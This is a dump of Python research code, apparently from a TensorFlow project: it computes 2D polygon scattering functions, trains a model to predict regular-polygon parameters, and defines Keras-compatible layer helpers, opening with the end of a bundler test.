asset1 = mocker.MagicMock(spec=Asset)
content1 = mocker.MagicMock(spec=AssetContent)
content1.__str__.return_value = 'test=True'
asset1.content = content1
asset1.name = 'asset1'
asset1.target_path = Path('asset1.py')
asset2 = mocker.MagicMock(spec=Asset)
content2 = mocker.MagicMock(spec=AssetContent)
content2.__str__.return_value = 'test=False'
asset2.content = content2
asset2.name = 'somepackage.asset2'
asset2.target_path = Path('somepackage/asset2.py')
assets = [asset1, asset2]
asset_group = mocker.MagicMock(spec=AssetGroup)
asset_group.deep_assets = assets
bundle = mocker.MagicMock(spec=Bundle)
bundle.asset_group = asset_group
bundler.bundle(bundle, package=package)
assert os.path.exists('dist/package1/asset1.py')
with open('dist/package1/asset1.py') as f:
assert f.read() == 'test=True'
assert os.path.exists('dist/package1/somepackage/asset2.py')
with open('dist/package1/somepackage/asset2.py') as f:
assert f.read() == 'test=False'
``` |
{
"source": "JochenZoellner/tf_neiss-1",
"score": 3
} |
#### File: data_gen_2dt/data_gen_t2d_util/tf_polygon_2d_helper.py
```python
import logging
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from shapely import geometry
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.polygone_2d_helper as old_helper
logger = logging.getLogger("polygone_2d_helper")
# logger.setLevel("DEBUG")
# logger.setLevel("INFO")
if __name__ == "__main__":
logging.basicConfig()
np.set_printoptions(precision=6, suppress=True)
class Fcalculator:
def __init__(self, points, epsilon=np.array(0.0001)):
"""points is list of tupel with x,y like [(x1,y1), (x2,y2), (x3,y3),...]"""
self.epsilon = epsilon
self.points = points
def q_of_phi(self, phi):
a_ = tf.math.cos(phi)
b_ = tf.math.sin(phi) - 1.0
q = tf.Variable([a_, b_])
logger.debug("q^2: {}".format(tf.math.abs(q[0] ** 2 + q[1] ** 2)))
return q
def F_of_qs(self, q, p0_, p1_, c=0.0):
p0 = np.array(p0_)
p1 = np.array(p1_)
c = np.array(c)
q_cross = np.array([-q[1], q[0]])
p0p1 = p1 - p0
scale = 1.0 / np.abs(np.abs(q[0] ** 2 + q[1] ** 2))
if scale >= 1000.0 / self.epsilon:
logger.debug("Scale == NONE")
polygon = geometry.Polygon(self.points)
            area = np.array(polygon.area, dtype=complex)
logger.debug("area: {}".format(area))
s_value = area / len(self.points)
elif np.abs(np.dot(p0p1, q)) >= 0.0001:
f_p0 = -1.0 * np.exp(1.0j * (np.dot(p0, q) + c))
f_p1 = -1.0 * np.exp(1.0j * (np.dot(p1, q) + c))
s_value = scale * np.dot(p0p1, q_cross) * (f_p1 - f_p0) / np.dot(p0p1, q)
else:
logger.debug("np.dot(p0p1, q) > epsilon")
s_value = scale * np.dot(p0p1, q_cross) * -1.0j * np.exp(1.0j * (np.dot(p0, q) + c))
logger.debug("s_value: {:1.6f}".format(s_value))
return s_value
def F_of_qs_arr(self, q, p0_, p1_, c=0.0):
p0 = np.array(p0_)
p1 = np.array(p1_)
c = np.array(c)
q_cross = np.array([-q[1], q[0]])
p0p1 = p1 - p0
# scale = 1.0 / np.abs(np.dot(q, q))
scale = 1.0 / np.abs(q[0] ** 2 + q[1] ** 2)
f_p0 = -tf.complex(1.0, 0.0) * tf.math.exp(tf.complex(0.0, 1.0) * tf.complex(tf.tensordot(p0, q, axes=0), 0.0))
f_p1 = -tf.complex(1.0, 0.0) * tf.math.exp(tf.complex(0.0, 1.0) * tf.complex(tf.tensordot(p1, q, axes=0), 0.0))
case1_array = scale * np.dot(p0p1, q_cross) * (f_p1 - f_p0) / np.dot(p0p1, q)
        case2_array = scale * np.dot(p0p1, q_cross) * tf.complex(0.0, -1.0) * tf.math.exp(
            tf.complex(0.0, 1.0) * tf.complex(np.dot(p0, q) + c, 0.0))
# print("case1_array.shape", case1_array.shape)
res_array = np.where(np.abs(np.dot(p0p1, q)) >= 0.0001, case1_array, case2_array)
if np.max(scale) >= 1000.0 / self.epsilon:
logger.debug("Scale == NONE")
polygon = geometry.Polygon(self.points)
            area = np.array(polygon.area, dtype=complex)
logger.debug("area: {}".format(area))
s_value = area / len(self.points)
case3_array = np.ones_like(q[0]) * s_value
res_array = np.where(scale >= 1000.0 / self.epsilon, case3_array, res_array)
return res_array
def F_of_phi(self, phi, c=0.0):
logger.debug("###########################################")
logger.info("phi: {}".format(phi))
sum_res = np.zeros_like(phi, dtype=np.complex256)
q = self.q_of_phi(phi)
for index in range(len(self.points)):
logger.debug("index: {}".format(index))
p0 = self.points[index - 1]
p1 = self.points[index]
logger.debug("p0: {}; p1: {}".format(p0, p1))
sum_res += self.F_of_qs_arr(q, p0, p1, c=c)
logger.debug("sum_res {}".format(sum_res))
final_res = sum_res
logger.debug("sum_res.dtype: {}".format(sum_res.dtype))
logger.info("final value: {}".format(final_res))
return final_res
if __name__ == "__main__":
for target in range(4999):
convex_polygon_arr = old_helper.generate_target_polygon()
convex_polygon_tuple = old_helper.array_to_tuples(convex_polygon_arr)
polygon_calculator = Fcalculator(points=convex_polygon_tuple)
phi_array = np.arange(np.pi / 2 - 1.5, np.pi / 2 + 1.5, 0.01)
polygon_scatter_res = np.array(
[polygon_calculator.F_of_phi(phi=phi).astype(dtype=np.complex64) for phi in phi_array])
print(convex_polygon_arr.shape)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(9.5, 14))
ax1.plot(phi_array, polygon_scatter_res.real, "-b", label="real_polygon")
ax1.plot(phi_array, polygon_scatter_res.imag, "-y", label="imag_polygon")
ax1.plot(phi_array, np.abs(polygon_scatter_res), "-y", label="abs_polygon")
ax2.fill(convex_polygon_arr.transpose()[0], convex_polygon_arr.transpose()[1])
ax2.set_xlim((-50, 50))
ax2.set_ylim((-50, 50))
ax2.set_aspect(aspect=1.0)
plt.show()
```
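A short usage sketch (not part of the repository) that evaluates the per-edge formula of `Fcalculator.F_of_qs` for a hand-made triangle at a single angle, computing `q` directly with NumPy instead of the TensorFlow-based `q_of_phi`:
```python
import numpy as np

points = [(0.0, 0.0), (10.0, 0.0), (0.0, 10.0)]  # made-up triangle
calc = Fcalculator(points=points)

phi = np.pi / 2 + 0.3
q = np.array([np.cos(phi), np.sin(phi) - 1.0])  # same definition as q_of_phi

# sum the edge contributions (points[i-1] -> points[i]) exactly like F_of_phi does
f_value = sum(calc.F_of_qs(q, points[i - 1], points[i]) for i in range(len(points)))
print(f_value)  # complex scattering value F(phi) for this polygon
```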
#### File: model_fn/model_fn_2d/model_fn_rp2d.py
```python
import os
import shutil
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from shapely import geometry
from itertools import permutations
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.polygone_2d_helper as p2dh
import model_fn.model_fn_2d.util_2d.graphs_rp2d as graphs
from model_fn.model_fn_base import ModelBase
class ModelRegularPolygon(ModelBase):
def __init__(self, params):
super(ModelRegularPolygon, self).__init__(params)
self._flags = self._params['flags']
self._targets = None
self._point_dist = None
self._summary_object = {"tgt_points": [], "pre_points": [], "ordered_best": [], "unordered_best": []}
def get_graph(self):
return getattr(graphs, self._params['flags'].graph)(self._params)
def get_placeholder(self):
return {"fc": tf.compat.v1.placeholder(tf.float32, [None, 3, None], name="infc")}
def get_output_nodes(self, has_graph=True):
if has_graph:
tf.identity(self._graph_out['radius_pred'], name="radius_pred") # name to grab from java
tf.identity(self._graph_out['rotation_pred'], name="rotation_pred") # name to grab from java
tf.identity(self._graph_out['translation_pred'], name="translation_pred") # name to grab from java
tf.identity(self._graph_out['edges_pred'], name="edges_pred") # name to grab from java
return "radius_pred,rotation_pred,translation_pred,edges_pred" # return names as comma separated string without spaces
#
# return {"radius_pred": radius_final,
# "rotation_pred": rotation_final,
# "translation_pred": translation_final,
# # "edges_pred": edge_final}
def get_target_keys(self):
return 'radius,rotation,translation,edges'
def get_predictions(self):
return self._graph_out
def info(self):
self.get_graph().print_params()
def get_loss(self):
# self._targets['points'] = tf.Print(self._targets['points'], [self._targets['points']])
# loss0 = tf.losses.absolute_difference(self._targets['points'], self._graph_out['p_pred'])
# print("params train batch size", self._params["flags"].train_batch_size)
# print("points", self._targets['points'])
max_edges = self._flags.max_edges
loss = 0.0
loss_edge = tf.reduce_mean(tf.sqrt(tf.compat.v1.losses.softmax_cross_entropy(
tf.one_hot(tf.squeeze(self._targets['edges'], axis=-1) - 3, depth=max_edges - 3),
self._graph_out['edges_pred'])), name="loss_edge")
loss_radius = tf.losses.mean_squared_error(self._targets['radius'], self._graph_out["radius_pred"],
scope="loss_radius")
loss_rotation = tf.losses.mean_squared_error(self._targets['rotation'], self._graph_out["rotation_pred"],
scope="loss_rotation")
loss_translation = tf.losses.mean_squared_error(
tf.sqrt(tf.reduce_sum(tf.math.square(self._targets['translation']))),
tf.sqrt(tf.reduce_sum(tf.math.square(self._graph_out["translation_pred"]))), scope="loss_translation")
loss = loss_edge + loss_radius + loss_rotation + loss_translation / 10.0
# loss = tf.Print(loss, [loss, loss_edge, loss_radius, loss_rotation, loss_translation], message="loss:all, edge, radius, rotation, translation:")
return loss
def export_helper(self):
for train_list in self._params['flags'].train_lists:
data_id = os.path.basename(train_list)[:-10]
shutil.copy(os.path.join("data/synthetic_data", data_id, "log_{}_train.txt".format(data_id)),
os.path.join(self._params['flags'].checkpoint_dir, "export"))
data_id = os.path.basename(self._params['flags'].val_list)[:-8]
shutil.copy(os.path.join("data/synthetic_data", data_id, "log_{}_val.txt".format(data_id)),
os.path.join(self._params['flags'].checkpoint_dir, "export"))
#
# def get_metrics(self):
# loss_rotation = tf.get_variable(name="graph/loss_rotation_0")
# return {'loss_rotaion': loss_rotation}
def print_evaluate(self, output_dict, target_dict):
with tf.compat.v1.Session().as_default():
tgt_area_sum = 0
area_diff_sum = 0
print("Targets")
print(target_dict)
print("Predictions:")
print(output_dict)
iou_arr = np.zeros(output_dict["edges_pred"].shape[0])
for i in range(output_dict["edges_pred"].shape[0]):
print(output_dict['edges_pred'][i])
rpf_dict_pred = {'radius': float(output_dict['radius_pred'][i]),
'rotation': float(output_dict['rotation_pred'][i]),
'translation': np.squeeze(output_dict['translation_pred'][i]),
'edges': np.argmax(output_dict['edges_pred'][i]) + 3}
rpf_dict_tgt = {'radius': float(target_dict['radius'][i]),
'rotation': float(target_dict['rotation'][i]),
'translation': np.squeeze(target_dict['translation'][i]),
'edges': int(target_dict['edges'][i])}
pred_array = p2dh.rpf_to_points_array(rpf_dict_pred)
pred_tuples = p2dh.array_to_tuples(pred_array)
tgt_array = p2dh.rpf_to_points_array(rpf_dict_tgt)
tgt_tuples = p2dh.array_to_tuples(tgt_array)
pre_polygon = geometry.Polygon(pred_tuples)
tgt_polygon = geometry.Polygon(tgt_tuples)
intersetion_area = pre_polygon.intersection(tgt_polygon).area
union_area = pre_polygon.union(tgt_polygon).area
iou_arr[i] = intersetion_area / union_area
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(9.5, 14))
## prediction
polygon_calculator = p2dh.Fcalculator(pred_tuples)
phi_array = np.arange(np.pi / 2 - 1.5, np.pi / 2 + 1.5, 0.01)
polygon_scatter_res = polygon_calculator.F_of_phi(phi=phi_array).astype(dtype=np.complex64)
ax1.fill(pred_array.transpose()[0], pred_array.transpose()[1], label="pred", alpha=0.5)
ax2.plot(phi_array, polygon_scatter_res.real, "-b", label="real_polygon_pred")
ax2.plot(phi_array, polygon_scatter_res.imag, "-y", label="imag_polygon_pred")
ax2.plot(phi_array, np.abs(polygon_scatter_res), "-r", label="abs_polygon_pred")
## target
polygon_calculator = p2dh.Fcalculator(tgt_tuples)
phi_array = np.arange(np.pi / 2 - 1.5, np.pi / 2 + 1.5, 0.01)
polygon_scatter_res = polygon_calculator.F_of_phi(phi=phi_array).astype(dtype=np.complex64)
ax1.fill(tgt_array.transpose()[0], tgt_array.transpose()[1], label="tgt", alpha=0.5)
ax2.plot(phi_array, polygon_scatter_res.real, "-b", label="real_polygon_tgt")
ax2.plot(phi_array, polygon_scatter_res.imag, "-y", label="imag_polygon_tgt")
ax2.plot(phi_array, np.abs(polygon_scatter_res), "-r", label="abs_polygon_tgt")
ax1.set_xlim((-50, 50))
ax1.set_ylim((-50, 50))
ax1.set_aspect(aspect=1.0)
ax2.legend(loc=2)
ax1.legend(loc=2)
plt.show()
plt.clf()
plt.close()
print("iou:", iou_arr[i])
print("mean iou:", np.mean(iou_arr))
return area_diff_sum, tgt_area_sum
# def print_evaluate_summary(self):
# sample_counter = 0
# import matplotlib.pyplot as plt
#
# from matplotlib.patches import Polygon
# from shapely import geometry
# from matplotlib.collections import PatchCollection
# summary_lenght= len(self._summary_object["tgt_points"])
# print("summary length: {}".format(summary_lenght))
#
# tgt_area_arr = np.zeros(summary_lenght)
# pre_area_arr = np.zeros(summary_lenght)
# pre_area_arr = np.zeros(summary_lenght)
# iou_arr = np.zeros(summary_lenght)
# co_loss_arr = np.ones(summary_lenght) * np.nan
# wo_loss_arr = np.ones(summary_lenght) * np.nan
#
# for i in range(summary_lenght):
# pre_points = np.reshape(self._summary_object["pre_points"][i], (3,2))
# tgt_points = np.reshape(self._summary_object["tgt_points"][i], (3,2))
# # print(pre_points)
# # print(tgt_points)
# pre_polygon = geometry.Polygon([pre_points[0], pre_points[1], pre_points[2]])
# tgt_polygon = geometry.Polygon([tgt_points[0], tgt_points[1], tgt_points[2]])
# # print(pre_points, tgt_points)
# # print(i)
# intersetion_area = pre_polygon.intersection(tgt_polygon).area
# union_area = pre_polygon.union(tgt_polygon).area
# iou_arr[i] = intersetion_area / union_area
# tgt_area_arr[i] = tgt_polygon.area
# pre_area_arr[i] = pre_polygon.area
# # co_loss_arr[i] = self._summary_object["ordered_best"][i]
# # wo_loss_arr[i] = self._summary_object["unordered_best"][i]
# # if True:
# # fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(9.5, 14))
# #
# # ax1.fill(tgt_points.transpose()[0],tgt_points.transpose()[1], "b", pre_points.transpose()[0], pre_points.transpose()[1], "r", alpha=0.5)
# # ax1.set_aspect(1.0)
# # ax1.set_xlim(-20, 20)
# # ax1.set_ylim(-20, 20)
# #
# # ax2.set_title("F(phi)")
# # ## target
# # fc_arr_tgt = t2d.make_scatter_data(tgt_points, epsilon=0.002, dphi=0.001)
# # ax2.plot(fc_arr_tgt[0], fc_arr_tgt[1], label="real_tgt")
# # ax2.plot(fc_arr_tgt[0], fc_arr_tgt[2], label="imag_tgt")
# # ## prediction
# # fc_arr_pre = t2d.make_scatter_data(pre_points, epsilon=0.002, dphi=0.001)
# # ax2.plot(fc_arr_pre[0], fc_arr_pre[1], label="real_pre")
# # ax2.plot(fc_arr_pre[0], fc_arr_pre[2], label="imag_pre")
# # ax2.legend(loc=4)
# #
# #
# # ax1.set_title("(red) pre_points: p1={:2.2f},{:2.2f};p2={:2.2f},{:2.2f};p3={:2.2f},{:2.2f}\n"
# # "(blue)tgt_points: p1={:2.2f},{:2.2f};p2={:2.2f},{:2.2f};p3={:2.2f},{:2.2f}\n"
# # "iou: {:1.2f}; doa (real) {:1.2f}; doa (imag) {:1.2f}".format(
# # pre_points[0][0], pre_points[0][1], pre_points[1][0], pre_points[1][1], pre_points[2][0], pre_points[2][1],
# # tgt_points[0][0], tgt_points[0][1], tgt_points[1][0], tgt_points[1][1], tgt_points[2][0], tgt_points[2][1],
# # intersetion_area / union_area, np.sum(np.abs(fc_arr_tgt[1] - fc_arr_pre[1])) / np.sum(np.abs(fc_arr_tgt[1]) + np.abs(fc_arr_pre[1])),
# # np.sum(np.abs(fc_arr_tgt[2] - fc_arr_pre[2])) / np.sum(np.abs(fc_arr_tgt[2]) + np.abs(fc_arr_pre[2]))
# # ))
# # plt.grid()
# # pdf = os.path.join(self._params['flags'].model_dir, "single_plot_{}.pdf".format(sample_counter))
# # sample_counter += 1
# # fig.savefig(pdf)
# # plt.clf()
# # plt.close()
# # plt.show()
#
# print("mean iou: {}".format(np.mean(iou_arr)))
# print("sum tgt area: {}; sum pre area: {}; p/t-area: {}".format(np.mean(tgt_area_arr), np.mean(pre_area_arr), np.sum(pre_area_arr) / np.sum(tgt_area_arr) ))
# # print("wrong order loss: {}; correct order loss: {}; order missed: {}".format(np.nanmean(wo_loss_arr), np.nanmean(co_loss_arr), np.count_nonzero(~np.isnan(wo_loss_arr)) ))
#
# from PyPDF2 import PdfFileMerger
#
# plt.close("all")
# pdfs = [os.path.join(self._params['flags'].model_dir, "single_plot_{}.pdf".format(x)) for x in range(sample_counter)]
# merger = PdfFileMerger()
# for pdf in pdfs:
# merger.append(pdf)
# merger.write(os.path.join(self._params['flags'].model_dir, "plot_summary.pdf"))
# merger.close()
# for pdf in pdfs:
# if os.path.isfile(pdf):
# os.remove(pdf)
# else:
# logging.warning("Can not delete temporary file, result is probably incomplete!")
#
```
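The evaluation above scores predictions by polygon intersection-over-union via Shapely; a tiny standalone illustration with made-up squares (not from the repository):
```python
from shapely import geometry

pred = geometry.Polygon([(0, 0), (4, 0), (4, 4), (0, 4)])
tgt = geometry.Polygon([(2, 0), (6, 0), (6, 4), (2, 4)])

iou = pred.intersection(tgt).area / pred.union(tgt).area
print(iou)  # 8 / 24 = 0.333..., i.e. one third of the union area overlaps
```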
#### File: model_fn/util_model_fn/keras_compatible_layers.py
```python
import numpy as np
import tensorflow as tf
from tensorflow.python.util.tf_export import tf_export
# Not all layers have been refactored for TensorFlow 2 yet. Use tf.keras.layers directly or update this
# implementation as was done in ff_layer().
# <editor-fold desc="Activation Functions (leaky_relu, relu, elu, sigmoid, tanh, softmax)">
def leaky_relu(x, leak=0.1, name="leakyRelu"):
"""
Leaky ReLU activation function as proposed in the paper:
http://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf
It allows a small, non-zero gradient when the unit is not active.
Args:
x: input tensor.
leak: `float`, hyperparameter that controls the slope of the negative part. It corresponds
to `1/a` in the original paper and should take on small positive values between 0 and 1.
If it's 0, the Leaky ReLU becomes the standard ReLU.
name: `str`, the name scope.
Returns:
output tensor with the same shape as `x`.
"""
assert 0.0 <= leak <= 1.0
    return tf.maximum(0.0, x) + leak * tf.minimum(0.0, x)
# f1 = 0.5 * (1 + leak)
# f2 = 0.5 * (1 - leak)
# return f1 * features + f2 * abs(features)
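    # Illustrative check (not part of the original file):
    #   leaky_relu(tf.constant([-2.0, 0.0, 3.0]), leak=0.1) evaluates element-wise to [-0.2, 0.0, 3.0]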
def relu(features, name=None):
    return tf.nn.relu(features, name=name)
def elu(features, name=None):
return tf.nn.elu(features, name=name)
def sigmoid(x, name=None):
return tf.nn.sigmoid(x, name=name)
def tanh(x, name=None):
return tf.nn.tanh(x, name=name)
def softmax(inputs, axis=None, name=None):
return tf.nn.softmax(inputs, axis=axis, name=name)
# </editor-fold>
# <editor-fold desc="Trainable Layers (Feedforward Layer, Recurrent Layer)">
# <editor-fold desc="Feedforward Layer (ff_layer, conv1d, conv2d, sep_conv2d, dil_conv2d, deconv2d)">
def ff_layer(inputs,
outD,
is_training,
activation=relu,
use_bias=True,
use_bn=False,
initOpt=0,
biasInit=0.1,
name="dense", keras_model=None):
"""
    Feed-forward (dense) layer that supports processing entire feature maps (position-wise classification over the last dimension's features).
    :param inputs:
    :param outD: `int`, number of output features.
    :param is_training:
    :param activation:
    :param use_bias:
    :param use_bn:
    :param initOpt: kernel initializer; 0 selects 'glorot_uniform', otherwise a Keras initializer identifier string.
    :param biasInit:
    :param name:
    :param keras_model: model object whose `_tracked_layers` dict is used to create and reuse the Dense layer.
    :return:
"""
# print(keras_model._layers)
if initOpt == 0:
initOpt = 'glorot_uniform'
if type(initOpt) is not str:
        raise AttributeError("Unknown kernel init opt")
if not keras_model._built and name not in keras_model._tracked_layers:
keras_model._tracked_layers[name] = tf.keras.layers.Dense(units=outD, activation=None, use_bias=use_bias,
kernel_initializer=initOpt,
bias_initializer='zeros', kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None, kernel_constraint=None,
bias_constraint=None, name=name)
# if keras_model:
# keras_model.add(dense_obj)
# print("test")
outputs = keras_model._tracked_layers[name](inputs)
if use_bn:
        outputs = tf.keras.layers.BatchNormalization(scale=True, fused=True, name="batchNorm")(
            outputs, training=is_training)
if activation:
outputs = activation(outputs, name='activation')
return outputs
def reshape(tensor, shape, name=None):
if len(shape) == 1:
target_shape = shape
else:
target_shape = shape[1:]
reshape_layer = tf.keras.layers.Reshape(target_shape, name=name)
return reshape_layer(tensor)
def conv1d(inputs, is_training, # to be used later ?!
kernel_width,
filters,
stride=1,
activation=relu,
padding='SAME',
use_bias=True,
initOpt=0,
biasInit=0.1,
drop_rate=0.0,
name='conv1d'):
"""Adds a 1-D convolutional layer given 3-D `inputs`.
Returns:
`3-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
kernel_shape = [kernel_width, inputs.get_shape().as_list()[-1], filters] # [width, inFeat, outFeat]
strides = [1, 1, stride, 1]
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] + kernel_shape[2]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel_shape = [1, kernel_shape[0], kernel_shape[1], kernel_shape[2]]
inputs = tf.expand_dims(inputs, axis=1)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
outputs = conv2d_op(inputs, kernel, strides, padding=padding, name='conv')
if use_bias:
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(outputs, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
outputs = tf.squeeze(outputs, axis=1)
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def conv2d(inputs, is_training, # to be used later ?!
kernel_size,
filters,
strides=None,
activation=relu,
padding='SAME',
use_bias=True,
initOpt=0,
biasInit=0.1,
drop_rate=0.0,
name="conv2d"):
"""Adds a 2-D convolutional layer given 4-D `inputs` and `kernel`.
Args:
scope_or_name: `string` or `VariableScope`, the scope to open.
inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
is_training: `bool`, whether or not the layer is in training mode.
kernel_size: list of `ints`, length 2, [kernel_height, kernel_width].
filters: `int`, number of output filter.
strides: list of `ints`, length 4, the stride of the sliding window for each dimension of `inputs`.
activation: activation function to be used (default: `relu`).
padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
Returns:
`4-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
kernel_shape = [kernel_size[0], kernel_size[1], inputs.get_shape().as_list()[-1], filters]
if strides is None:
strides = [1, 1, 1, 1]
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
outputs = conv2d_op(inputs, kernel, strides, padding=padding, name='conv')
if use_bias:
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(outputs, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
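# Illustrative shape check (assumption, not from the original file): for an input of shape [B, H, W, C],
# conv2d(inputs, is_training, kernel_size=[3, 3], filters=64) with default strides and 'SAME' padding
# returns a tensor of shape [B, H, W, 64].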
def sep_conv2d(inputs,
is_training,
kernel_size,
filters,
depth_multiplier,
strides=None,
activation=relu,
drop_rate=0.0,
initOpt=0,
biasInit=0.1,
padding='SAME',
name='sep_conv2d'):
with tf.compat.v1.variable_scope(name):
kernel_shape = [kernel_size[0], kernel_size[1], inputs.get_shape().as_list()[-1], filters]
if strides is None:
strides = [1, 1, 1, 1]
if initOpt == 0:
stddev1 = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + 1))
stddev2 = np.sqrt(2.0 / (kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev1 = 5e-2
stddev2 = 5e-2
if initOpt == 2:
stddev1 = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
stddev2 = min(np.sqrt(2.0 / (kernel_shape[2])), 5e-2)
kernel1 = tf.compat.v1.get_variable("weights_sep",
[kernel_shape[0], kernel_shape[1], kernel_shape[2], depth_multiplier],
initializer=tf.random_normal_initializer(stddev=stddev1))
kernel2 = tf.compat.v1.get_variable("weights_1x1", [1, 1, depth_multiplier * kernel_shape[2], kernel_shape[3]],
initializer=tf.random_normal_initializer(stddev=stddev2))
conv = tf.nn.separable_conv2d(inputs, depthwise_filter=kernel1, pointwise_filter=kernel2, strides=strides,
padding=padding, name="sep_conv")
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def dil_conv2d(inputs, is_training,
kernel_shape,
rate,
activation=relu,
drop_rate=0.0,
initOpt=0, biasInit=0.1, padding="SAME", name='dil_conv2d'):
"""Adds a 2-D convolutional layer given 4-D `inputs` and `kernel` with optional BatchNorm, LocalResponseNorm and Dropout.
Args:
scope_or_name: `string` or `VariableScope`, the scope to open.
inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
kernel: `4-D Tensor`, [kernel_height, kernel_width, in_channels, out_channels] kernel.
bias: `1-D Tensor`, [out_channels] bias.
rate: `int`, Dilation factor.
activation: activation function to be used (default: `relu`).
use_bn: `bool`, whether or not to include batch normalization in the layer.
is_training: `bool`, whether or not the layer is in training mode. This is only used if `use_bn` == True.
use_lrn: `bool`, whether or not to include local response normalization in the layer.
keep_prob: `double`, dropout keep prob.
dropout_maps: `bool`, If true whole maps are dropped or not, otherwise single elements.
padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
Returns:
`4-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
conv = tf.nn.atrous_conv2d(inputs, kernel, rate=rate, padding=padding)
bias = tf.compat.v1.get_variable("bias", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def deconv2d(inputs, is_training, kernel_shape, out_shape, subS=2, activation=relu,
drop_rate=0.0,
initOpt=0, biasInit=0.1, name='deconv2d'):
with tf.compat.v1.variable_scope(name):
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
bias = tf.compat.v1.get_variable("bias", kernel_shape[2],
initializer=tf.constant_initializer(value=biasInit))
conv = tf.nn.conv2d_transpose(inputs, kernel, out_shape, strides=[1, subS, subS, 1], padding='SAME',
name='conv')
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
# </editor-fold>
# <editor-fold desc="Recurrent Layer (b_rnn_layer)">
def b_rnn_layer(inputs,
is_training,
n_hidden,
seq_length=None,
use_cudnn=True,
time_major=True,
cell_type='LSTM',
name='b_rnn'):
"""
    Bidirectional RNN layer. Input is assumed to be of shape (dim0 x dim1 x FEATURES_IN);
    output is of shape (dim0 x dim1 x 2 * n_hidden), forward and backward outputs concatenated.
    :param inputs: `3-D Tensor`, time-major input [max_time, batch_size, features_in]
    :param is_training: `bool`, whether the layer is in training mode
    :param n_hidden: `int`, number of hidden units per direction
    :param seq_length: `1-D Tensor`, sequence length per batch element (used to reverse the backward input)
    :param use_cudnn: currently has no effect, both branches use the same Keras LSTM implementation
    :param time_major: must be True; time_major=False is not supported for variable sequence length
    :param cell_type: 'LSTM' or 'GRU' (currently only the LSTM path is implemented)
    :param name: scope name
    :return: `3-D Tensor` of shape (dim0 x dim1 x 2 * n_hidden)
"""
with tf.compat.v1.variable_scope(name):
        if use_cudnn or not use_cudnn:  # both branches currently use the same Keras LSTM implementation
if not time_major:
